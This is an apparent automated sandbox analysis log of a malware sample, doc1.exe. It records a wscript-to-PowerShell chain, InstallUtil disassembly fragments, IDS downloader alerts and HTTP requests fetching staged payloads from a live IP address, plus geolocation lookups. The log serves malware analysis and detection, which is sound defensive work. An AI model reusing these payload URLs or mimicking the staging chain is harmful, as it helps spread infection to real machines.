                  Source: doc1.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft

                  Software Vulnerabilities

                  Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0577F2D1h21_2_0577F028
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0577B601h21_2_0577B358
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0577E5C9h21_2_0577E320
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0577EE79h21_2_0577EBD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0577DD19h21_2_0577DA70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066576F9h21_2_06657450
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066588EDh21_2_066585B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]21_2_06653676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06656119h21_2_06655E70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066569C9h21_2_06656720
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066572A2h21_2_06656FF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06650741h21_2_06650498
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06657FA9h21_2_06657D00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06655869h21_2_066555C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06655CC1h21_2_06655A18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06656571h21_2_066562C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]21_2_06653360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06656E21h21_2_06656B78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]21_2_06653350
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066502E9h21_2_06650040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06650B99h21_2_066508F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06657B51h21_2_066578A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066553E9h21_2_06655140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06658401h21_2_06658158
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 013DE61Fh26_2_013DE431
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 013DEFA9h26_2_013DE431
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 013DFA39h26_2_013DF778
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h26_2_013DE005
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h26_2_013DD7F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h26_2_013DDE23
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06881011h26_2_06880D60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688DD19h26_2_0688DA70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068815D8h26_2_068811C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688E171h26_2_0688DEC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688D8C1h26_2_0688D618
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688BA59h26_2_0688B7B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688B1A9h26_2_0688AF00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688EA21h26_2_0688E778
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688F729h26_2_0688F480
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06880751h26_2_068804A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688C761h26_2_0688C4B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688BEB1h26_2_0688BC08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068815D8h26_2_06881506
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688D011h26_2_0688CD68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688EE79h26_2_0688EBD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688E5C9h26_2_0688E320
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688B601h26_2_0688B358
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688FB81h26_2_0688F8D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688F2D1h26_2_0688F028
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068802F1h26_2_06880040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688C309h26_2_0688C060
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688D469h26_2_0688D1C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06880BB1h26_2_06880900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688CBB9h26_2_0688C910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B88EDh26_2_068B85B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B6119h26_2_068B5E70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B72A2h26_2_068B6FF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B69C9h26_2_068B6720
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B0741h26_2_068B0498
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B76F9h26_2_068B7450
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B5869h26_2_068B55C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B7FA9h26_2_068B7D00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B6571h26_2_068B62C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B5CC1h26_2_068B5A18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]26_2_068B3350
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]26_2_068B3360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B6E21h26_2_068B6B78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B7B51h26_2_068B78A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B0B99h26_2_068B08F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B02E9h26_2_068B0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B53E9h26_2_068B5140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B8401h26_2_068B8158

                  Networking

                  Source: C:\Windows\SysWOW64\wscript.exe Network Connect: 144.91.79.54 80
                  Source: Yara match File source: 11.2.bosotkm.exe.417bdd0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 1.2.doc1.exe.3c2d068.4.raw.unpack, type: UNPACKEDPE
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
                  Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox View IP Address: 158.101.44.242 158.101.44.242
                  Source: Joe Sandbox View ASN Name: CONTABODE CONTABODE
                  Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
                  Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                  Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: unknown DNS query: name: checkip.dyndns.org
                  Source: unknown DNS query: name: reallyfreegeoip.org
                  Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49727 -> 158.101.44.242:80
                  Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49761 -> 158.101.44.242:80
                  Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49750 -> 158.101.44.242:80
                  Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49723 -> 158.101.44.242:80
                  Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49716 -> 158.101.44.242:80
                  Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49746 -> 158.101.44.242:80
                  Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49742 -> 158.101.44.242:80
                  Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49756 -> 158.101.44.242:80
                  Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49721 -> 188.114.97.3:443
                  Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49725 -> 188.114.97.3:443
                  Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49736 -> 188.114.97.3:443
                  Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49728 -> 188.114.97.3:443
                  Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49760 -> 188.114.97.3:443
                  Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49751 -> 188.114.97.3:443
                  Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49766 -> 188.114.97.3:443
                  Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49755 -> 188.114.97.3:443
                  Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49745 -> 188.114.97.3:443
                  Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49763 -> 188.114.97.3:443
                  Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49764 -> 188.114.97.3:443
                  Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49759 -> 188.114.97.3:443
                  Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49768 -> 188.114.97.3:443
                  Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49774 -> 188.114.97.3:443
                  Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49747 -> 188.114.97.3:443
                  Source: global traffic HTTP traffic detected: GET /2508/s HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: en-CH User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: 144.91.79.54
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                  Source: global traffic HTTP traffic detected: GET /2508/r HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: en-CH User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: 144.91.79.54
                  Source: global traffic HTTP traffic detected: GET /2508/ThXb4tU1jp1fQQFsQkY1.txt HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: en-CH User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: 144.91.79.54
                  Source: global traffic HTTP traffic detected: GET /2508/v HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: en-CH User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: 144.91.79.54
                  Source: global traffic HTTP traffic detected: GET /2508/file HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: en-CH User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: 144.91.79.54
                  Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49717 version: TLS 1.0
                  Source: unknown HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49726 version: TLS 1.0
                  Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49743 version: TLS 1.0
                  Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49758 version: TLS 1.0
                  Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknown TCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
                  Source: global traffic HTTP traffic detected: GET /2508/s HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: en-CH User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: 144.91.79.54
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                  Source: global traffic HTTP traffic detected: GET /2508/r HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: en-CH User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: 144.91.79.54
                  Source: global traffic HTTP traffic detected: GET /2508/ThXb4tU1jp1fQQFsQkY1.txt HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: en-CH User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: 144.91.79.54
                  Source: global traffic HTTP traffic detected: GET /2508/v HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: en-CH User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: 144.91.79.54
                  Source: global traffic HTTP traffic detected: GET /2508/file HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: en-CH User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: 144.91.79.54
                  Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: wscript.exe, 00000003.00000003.2323886447.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2303011239.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327895356.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2310964537.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324767927.0000000000BB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2325391333.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324540081.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329453156.0000000000BB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/
                  Source: wscript.exe, 00000003.00000003.2323886447.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327895356.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324767927.0000000000BB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2325391333.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324540081.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329453156.0000000000BB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2508/
                  Source: wscript.exe, 00000003.00000003.2323886447.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327895356.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2310964537.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324767927.0000000000BB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324272341.0000000005761000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2330493341.000000000576E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2325391333.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324540081.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329453156.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2311543486.0000000000BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2310964537.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329957807.00000000030F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2508/ThXb4tU1jp1fQQFsQkY1.txt
                  Source: wscript.exe, 00000003.00000003.2310964537.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2508/ThXb4tU1jp1fQQFsQkY1.txtb
                  Source: wscript.exe, 00000003.00000003.2327596611.0000000000B92000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324169500.0000000000B85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2508/file
                  Source: wscript.exe, 00000003.00000003.2328017986.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2323812806.0000000000C2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2508/file0F?
                  Source: wscript.exe, 00000003.00000003.2328017986.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2323812806.0000000000C2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2508/filewF
                  Source: wscript.exe, 00000003.00000003.2323886447.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327895356.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2310964537.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327470587.00000000051A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324767927.0000000000BB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2325391333.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324540081.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329453156.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2310964537.0000000000BE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2508/r
                  Source: wscript.exe, 00000003.00000003.2327470587.00000000051A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2303245791.0000000000BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2303011239.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2508/s
                  Source: wscript.exe, 00000003.00000003.2323886447.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327347198.00000000030F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327895356.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327470587.00000000051A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324767927.0000000000BB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2321571179.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329992171.00000000030F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2325391333.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324540081.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329453156.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327265308.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2313721636.00000000030F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324169500.0000000000B85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2508/v
                  Source: wscript.exe, 00000003.00000003.2303011239.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2310964537.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/4
                  Source: wscript.exe, 00000003.00000003.2310964537.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/;
                  Source: wscript.exe, 00000003.00000003.2303011239.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/M
                  Source: wscript.exe, 00000003.00000003.2303245791.0000000000BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2303011239.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54:80/2508/s
